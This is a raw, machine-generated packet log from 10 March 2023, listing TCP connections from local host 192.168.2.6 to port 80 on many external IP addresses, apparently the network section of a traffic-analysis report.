                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.729945898 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.729965925 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.729988098 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.729995012 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.729996920 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.730019093 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.730027914 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.730058908 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.730062962 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.730083942 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.730086088 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.730117083 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.730123043 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.730148077 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.730190039 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.748791933 CET4992980192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753566027 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753607988 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753638029 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753671885 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753710032 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753786087 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753849030 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753874063 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753904104 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753941059 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.753972054 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.754199982 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.754235029 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.754264116 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.754268885 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.754293919 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.754316092 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.754323959 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.754354000 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.754380941 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755038977 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755074978 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755099058 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755099058 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755115986 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755151987 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755429029 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755467892 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755482912 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755497932 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755516052 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755527973 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755549908 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755551100 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755587101 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.755606890 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.756318092 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.756356955 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.756392002 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.756423950 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.756448984 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.756485939 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.756521940 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.757236004 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.757273912 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.757302046 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.757304907 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.757324934 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.757338047 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.757361889 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.757370949 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.757391930 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.757412910 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.758090019 CET8049921104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.758168936 CET4992180192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.822026968 CET4992880192.168.2.677.68.50.105
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.854629040 CET804992877.68.50.105192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.854664087 CET804992877.68.50.105192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.854737043 CET4992880192.168.2.677.68.50.105
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.859357119 CET8049925104.26.3.124192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.859391928 CET8049925104.26.3.124192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.868987083 CET4992580192.168.2.6104.26.3.124
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.903162956 CET80499293.130.204.160192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.905133009 CET4992980192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957309961 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957390070 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957439899 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957483053 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957526922 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957571983 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957601070 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957613945 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957658052 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957664967 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957685947 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957700968 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957709074 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957747936 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957792044 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957794905 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957834005 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957845926 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957878113 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957922935 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957931995 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957967043 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.957972050 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958009958 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958012104 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958054066 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958096027 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958098888 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958138943 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958153009 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958182096 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958225012 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958233118 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958266020 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958267927 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958309889 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958312035 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958354950 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958396912 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958398104 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958439112 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958482981 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958482981 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958525896 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958571911 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958574057 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958619118 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958661079 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958674908 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958713055 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958723068 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.958775997 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.991580009 CET804987780.93.82.33192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.991736889 CET4987780192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.992882013 CET4992980192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.123188972 CET804987859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.123392105 CET4987880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.135997057 CET4993180192.168.2.613.248.216.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.147187948 CET80499293.130.204.160192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.147219896 CET80499293.130.204.160192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.147351027 CET4992980192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.147351980 CET4992980192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.154617071 CET804993113.248.216.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.154752016 CET4993180192.168.2.613.248.216.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.167891026 CET4992980192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.174451113 CET804987970.39.251.249192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.174509048 CET4987980192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186511993 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186558962 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186599016 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186638117 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186677933 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186764002 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186774015 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186822891 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186830044 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186856985 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186883926 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186886072 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186927080 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186944962 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186966896 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.186984062 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187005997 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187021971 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187047005 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187068939 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187089920 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187103033 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187133074 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187151909 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187170982 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187187910 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.187231064 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.188189030 CET4993180192.168.2.613.248.216.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.189156055 CET4993380192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.200088978 CET4993480192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.206772089 CET804993113.248.216.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.278000116 CET4993580192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.287812948 CET8049933165.227.252.190192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.287920952 CET4993380192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.297082901 CET4993380192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.306973934 CET4993680192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.321831942 CET80499293.130.204.160192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.341526985 CET804993113.248.216.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.341622114 CET4993180192.168.2.613.248.216.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.354686022 CET80499343.130.204.160192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.354885101 CET4993480192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.365587950 CET4993480192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.379013062 CET4993180192.168.2.613.248.216.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.383445978 CET8049935208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.383593082 CET4993580192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.384375095 CET4993580192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.395667076 CET8049933165.227.252.190192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.395895958 CET8049933165.227.252.190192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.396042109 CET4993380192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.397783995 CET804993113.248.216.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.416762114 CET804991739.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.416975975 CET4991780192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.474046946 CET804993669.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.474181890 CET4993680192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.489101887 CET804993113.248.216.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.489413977 CET4993180192.168.2.613.248.216.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.489770889 CET8049935208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.490806103 CET8049935208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.490894079 CET4993580192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.491569996 CET8049935208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.491650105 CET4993580192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.519959927 CET80499343.130.204.160192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.520019054 CET80499343.130.204.160192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.520097017 CET4993480192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.520168066 CET4993480192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.562073946 CET4993480192.168.2.63.130.204.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.562211990 CET4993580192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.668169022 CET8049935208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.668987036 CET4993680192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.698626995 CET4993780192.168.2.6210.140.73.39
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.716519117 CET80499343.130.204.160192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.783474922 CET4994080192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.785260916 CET4993880192.168.2.6154.203.14.100
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.788738012 CET4993980192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.808321953 CET804994081.171.22.7192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.808514118 CET4994080192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.813738108 CET4994080192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.837316990 CET804993669.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.838140011 CET804993669.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.838242054 CET4993680192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.838464975 CET804994081.171.22.7192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.838835955 CET804993669.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.838908911 CET4993680192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.848849058 CET4993680192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.849661112 CET804994081.171.22.7192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.849756002 CET4994080192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.849889994 CET804994081.171.22.7192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.849942923 CET4994080192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.851521015 CET4994080192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.853893995 CET4994180192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.876194000 CET804994081.171.22.7192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.879049063 CET804994181.171.22.7192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.879226923 CET4994180192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.884783983 CET4994180192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.908788919 CET4994280192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.909998894 CET804994181.171.22.7192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.921097040 CET804994181.171.22.7192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.921247005 CET4994180192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.921284914 CET804994181.171.22.7192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.921355963 CET4994180192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.922621012 CET8049939208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.926337004 CET4993980192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.930881023 CET4994180192.168.2.681.171.22.7
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.938258886 CET4993980192.168.2.6208.97.178.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.956084013 CET804994181.171.22.7192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.963321924 CET4994380192.168.2.6104.26.3.124
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.971667051 CET4994480192.168.2.6188.166.152.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.979268074 CET4994580192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.979921103 CET8049943104.26.3.124192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.980006933 CET4994380192.168.2.6104.26.3.124
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.981328964 CET4994680192.168.2.6143.204.9.128
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.982012987 CET4994380192.168.2.6104.26.3.124
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.990277052 CET804989362.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.990355015 CET4989380192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.998703957 CET8049943104.26.3.124192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.001121998 CET8049946143.204.9.128192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.001265049 CET4994680192.168.2.6143.204.9.128
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.003375053 CET8049944188.166.152.188192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.003561974 CET4994480192.168.2.6188.166.152.188
